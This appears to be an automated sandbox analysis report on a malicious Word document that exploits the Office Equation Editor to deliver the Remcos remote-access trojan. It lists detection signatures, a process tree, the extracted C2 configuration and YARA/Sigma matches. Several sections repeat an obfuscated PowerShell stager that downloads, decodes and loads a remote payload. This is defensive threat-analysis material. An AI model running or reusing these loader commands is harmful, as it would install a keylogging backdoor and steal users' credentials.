
Windows Analysis Report
PO NAHK22012FA00000.docx.doc

Overview

General Information

Sample name: PO NAHK22012FA00000.docx.doc
Analysis ID: 1540324
MD5: a4633b398a95e20e7ec12dcaf3090e43
SHA1: 06b1ecd43566ad5aaa16986c0bccaf5c1561a31b
SHA256: e3c8080fba2dae8436582c23e49387b29f15dab713779d2d0f16a9d3ec022f3d
Tags: doc, docx, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3492 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3964 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • mshta.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • powershell.exe (PID: 3180 cmdline: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 2052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • csc.exe (PID: 2756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)
            • cvtres.exe (PID: 2740 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • wscript.exe (PID: 3068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
            • powershell.exe (PID: 1980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
              • powershell.exe (PID: 2924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
                • CasPol.exe (PID: 3608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["servemail.exprotedsteel.pro:6498:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N6HMP4", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "wordse"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
  • 0x1892:$obj2: \objdata
  • 0x18ac:$obj3: \objupdate
  • 0x186d:$obj6: \objlink
Source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
  • 0x1892:$obj2: \objdata
  • 0x18ac:$obj3: \objupdate
  • 0x186d:$obj6: \objlink
Source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source: 20.2.CasPol.exe.400000.0.raw.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 20.2.CasPol.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 20.2.CasPol.exe.400000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 20.2.CasPol.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source: 20.2.CasPol.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

                  Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 85.215.206.82, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3964, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3964, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wennedgreatthingswithgoodnwesforentrielifewithnew[1].hta

                  System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob removed]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3964, Protocol: tcp, SourceIp: 85.215.206.82, SourceIsIpv6: false, SourcePort: 80
Source: Process started; Author: Thomas Patzke; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
